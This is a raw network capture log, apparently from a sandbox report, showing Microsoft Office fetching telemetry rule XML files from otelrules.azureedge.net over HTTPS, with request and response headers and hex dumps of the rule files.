                                                                                                                                                                                                                                                              2024-11-27 15:32:00 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              87192.168.2.104979813.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:00 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:00 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 958
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                                                                              x-ms-request-id: eaf971a2-501e-008c-1d81-40cd39000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153200Z-174f78459684bddphC1EWRbht40000000wvg00000000cpxw
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:00 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              88192.168.2.104979913.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:00 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:01 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 501
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                                                                              x-ms-request-id: 42ae9f56-701e-0001-1d37-40b110000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153201Z-174f7845968kdththC1EWRzvxn00000009h0000000006hkt
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:01 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              89192.168.2.104980013.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:01 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:01 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 2592
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                                                                              x-ms-request-id: 8c2ab893-e01e-0003-5391-3f0fa8000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153201Z-174f7845968px8v7hC1EWR08ng0000000xb000000000h586
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:01 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              90192.168.2.104980113.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:01 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:01 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 3342
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                                                                              x-ms-request-id: 6eac8613-a01e-006f-3091-3f13cd000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153201Z-174f7845968zgtf6hC1EWRqd8s0000000q500000000040bc
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:02 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              91192.168.2.104980213.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:02 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:02 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 2284
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                                                                              x-ms-request-id: 49e8a97e-c01e-008e-5491-3f7381000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153202Z-174f7845968j6t2phC1EWRcfe80000000xa0000000009k57
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:02 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              92192.168.2.104980313.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:02 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:02 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1393
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                                                                              x-ms-request-id: 75932801-b01e-00ab-324d-40dafd000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153202Z-174f7845968glpgnhC1EWR7uec0000000x5g00000000rcu7
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:02 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              93192.168.2.104980413.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:02 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:03 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1356
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                                                                              x-ms-request-id: 003cf3b7-b01e-0053-2e8c-3fcdf8000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153203Z-174f7845968xr5c2hC1EWRd0hn0000000e00000000009ztt
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:03 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              94192.168.2.104980613.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:03 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:04 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1356
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                                                                              x-ms-request-id: 3d9c3aa7-901e-00ac-5891-3fb69e000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153204Z-174f7845968cdxdrhC1EWRg0en0000000wzg00000000q859
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:04 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              95192.168.2.104980713.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:04 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:04 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1395
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                                                                              x-ms-request-id: 6f07c4eb-901e-0029-3066-40274a000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153204Z-174f7845968psccphC1EWRuz9s0000000xfg000000000bmt
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
